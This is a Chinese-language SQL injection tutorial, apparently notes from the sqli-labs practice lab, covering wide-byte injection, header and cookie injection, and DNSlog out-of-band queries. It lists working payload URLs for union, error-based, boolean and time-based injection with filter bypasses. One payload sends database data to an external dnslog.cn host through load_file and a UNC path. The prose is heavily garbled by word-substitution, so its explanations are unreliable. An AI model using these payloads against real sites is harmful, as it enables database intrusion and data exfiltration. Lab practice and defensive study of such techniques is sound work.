Sql干系的转义字符函数
在mysql中,用于转义(即在字符串中的符号前加上”\”)的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情形是magic_quote_gpc,不过高版本的PHP将去除这个特性。
定义和用法
addslashes()函数返回在预定义字符之前添加反斜杠的字符串。
预定义字符是:
单引号()双引号(")反斜杠(八) NULL
涉及到的基本观点
字符、字符集
字符(character)是组成字符集(character set)的基本单位。对字符授予一个数值(encoding)来确定这个字符在该字符集中的位置。
UTF8
由于ASCII表示的字符只有128个,因此网络天下的规范是利用UNICODE编码,但是用ASCII表示的字符利用UNICODE并不高效。因此涌现了中间格式字符集,被称为通用转换格式,及UTF(Universal Transformation Format)。
宽字节
GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节,实际上只有两字节。宽字节带来的安全问题紧张是吃ASCII字符(一字节)的征象,即将两个ascii字符误认为是一个宽字节字符。
如果利用了类似于set names gbki这样得语句,此时mysq数据库就会将
Asci大于128(%d州得字符当作是汉字字符得一部分,从而能吃掉,引入单引号或者双号
宽字节注入事理:
GBK 占用两字节
ASCII占用一字节
PHP中编码为GBK,函数实行添加的是ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等宽字节字符集。
大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,个中\的十六进制是 %5C ,那么现在 %df\’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MySQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也便是縗,也便是说:%df\’ = %df%5c%27=縗’,有了单引号就好注入了。
大略的宽字节注入
Sqli –less 35 存在 addslashes
于是考试测验宽字节注入:
获取当前数据库名:
总结:宽字节注入事理即是利用编码转换,将做事器端逼迫添加的本来用于转义的\符号吃掉,从而能使攻击者输入的引号起到闭合浸染,以至于可以进行SQL注入。
User-agent注入
一、什么是User-Agent
User-Agent是Http协议中的一部分,属于头域的组成部分,User Agent也简称UA。用较为普通的一点来说,是一种向访问网站供应你所利用的浏览器类型、操作系统及版本、CPU 类型、浏览器渲染引擎、浏览器措辞、浏览器插件等信息的标识。UA字符串在每次浏览器 HTTP 要求时发送到做事器!
浏览器UA 字串的标准格式为: 浏览器标识 (操作系统标识; 加密等级标识; 浏览器措辞) 渲染引擎标识 版本信息
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('' or updatexml(1, concat('#', database()), 0), 1, 1) #
' or updatexml(1, concat('#', database()), 0), 1, 1) #
假造IP注入:Client-ip
getenvget 得到env===>environment 环境
getenv 得到环境变量 $_SERVER
X-Forwarded-For注入
X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡办法连接到Web做事器的客户端最原始的IP地址的HTTP要求头字段。进入环境,打开跳转页
$_SERVER['HTTP_USER_AGENT'] ====> user-agent$_SERVER['HTTP_CLIENT_IP'] =====> client-ip$_SERVER['HTTP_X_FORWARDED_FOR']=====> x-forwarded-for
创造 HTTP_XXX 都是可以通过掌握对应的要求包中的头部的值来掌握
SERVER注入
Cookie注入
cookie注入事理实在很大略,便是利用了session机制中的特性,只能说是特性,不能算是漏洞。
这里大略的说下事理,session的机制就相称于你有一张蛋糕店的会员卡,这张会员卡便是你浏览器中的cookie,上边有你的id号等信息,但是是否有效和有多少余额只能由店里边的柜员机决定,这个柜员机便是做事器上的session管理器,注入就好比有人静静的复制了你的会员卡(cookie),拿去店里消费,店里的柜员机看到信息符合就处理了。
什么是dnslog注入?
dnslog注入也可以称之为dns带外查询,是一种注入姿势,可以通过查询相应的dns解析记录,来获取我们想要的数据
为什么要进行dnslog注入?
一样平常情形下,在我们无法通过联合查询直接获取数据的情形下,我们只能通过盲注,来一步步的获取数据,但是,利用盲注,手工测试是须要花费大量的韶光的,可能会想到利用sqlmap直接去跑出数据,但在实际测试中,利用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,大概你也可以利用代理池。。。
知识扩展
首先解释,dns带外查询属于MySQL注入,在MySQL中有个别系属性
secure_file_priv特性,有三种状态
secure_file_priv为null 表示不许可导入导出
secure_file_priv指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹
secure_file_priv没有设置时,则表示没有任何限定
可理解一下load_file和outfile
LOAD_FILE()函数
LOAD_FILE()函数读取一个文件并将其内容作为字符串返回
语法为:load_file(file_name),个中file_name是文件的完全路径
此函数利用须要知足的条件
文件必须位于做事器主机上
你必须具有该FILE权限才能读取该文件。拥有该FILE权限的用户可以读取做事器主机上的任何文件,该文件是world-readable的或MySQL做事器可读的,此属性与secure_file_priv状态干系
文件必须是所有人都可读的,并且它的大小小于max_allowed_packet字节
UNC路径
什么是UNC路径?
UNC路径便是类似\\softer这样的形式的网络路径。它符合 \\servername\sharename 格式,个中 servername 是做事器名,sharename 是共享资源的名称。
目录或文件的 UNC 名称可以包括共享名称下的目录路径,格式为:\\servername\sharename\directory\filename。
例如把自己电脑的文件共享,你会得到如下路径,这便是UNC路径
//iZ53sl3r1890u7Z/Users/Administrator/Desktop/111.txt
DNSLOG平台
http://www.dnslog.cn
http://admin.dnslog.link
http://ceye.io
办理分外符号问题
26-27-28
Sqli less -26
联合查询注入
这一关过滤了and 空格 or
And和or可以用%26%26双写绕过 空格可以用()绕过
http://www.sqli.com/Less-26/?id=0%27union(select(1),group_concat(table_name),user()from(infoorrmation_schema.tables)where(table_schema=0x7365637572697479));%00
成功语句
SELECT FROM users WHERE id='0'union(select(1),group_concat(table_name),user()from(infoorrmation_schema.tables)where(table_schema=0x7365637572697479))
报错注入
http://www.sqli.com/Less-26/?id=1%27||%20(select%20(extractvalue(1,concat(0x7e,(select%20(group_concat(table_name))%20from%20(infoorrmation_schema.tables)%20where%20(table_schema=0x7365637572697479))))));%00
Bool注入
http://www.sqli.com/Less-26/?id=1%27%26%26(ascii(substr(user(),1,1))%3E114%20%23);%00
韶光注入
26/?id=1%27%26%26if(ascii(substr(user(),1,1))=114%20%23,sleep(3),1);%00 HTTP/1.1
Sqli less -27
字符型 可难是 id=’1’ 单引号闭合
联合查询
http://www.sqli.com/less-27/?id=0%27%09uNion%09seLect%091,group_concat(table_name),3%09from%09information_schema.tables%09where%09table_schema=0x7365637572697479;%00
报错注入
http://www.sqli.com/less-27/?id=1%27%09and%09extractvalue(1,concat(0x7e,(seLect%09group_concat(schema_name)%09from%09information_schema.schemata)));%00
Bool注入
韶光注入
26/?id=1%27%26%26if(ascii(substr(user(),1,1))=114%20%23,sleep(3),1);%00 HTTP/1.1
Sqli less -28
联合查询注入
http://www.sqli.com/Less-28/?id=0%27)union(select(1),group_concat(table_name),3%09from%09information_schema.tables%09where%09table_schema=%27security%27);%00
Bool 韶光注入
http://www.sqli.com/Less-28/?id=0%27)and%09if(ascii(substr(user(),1,1))=114%09,sleep(5),1);%00
DNS注入
http://www.sqli.com/Less-28/?id=0%27)%09and%09(select%09load_file(concat(%27\\\\%27,(select%09hex(user())),%27.3rq4km.dnslog.cn\abc%27)));%00
/有点问题
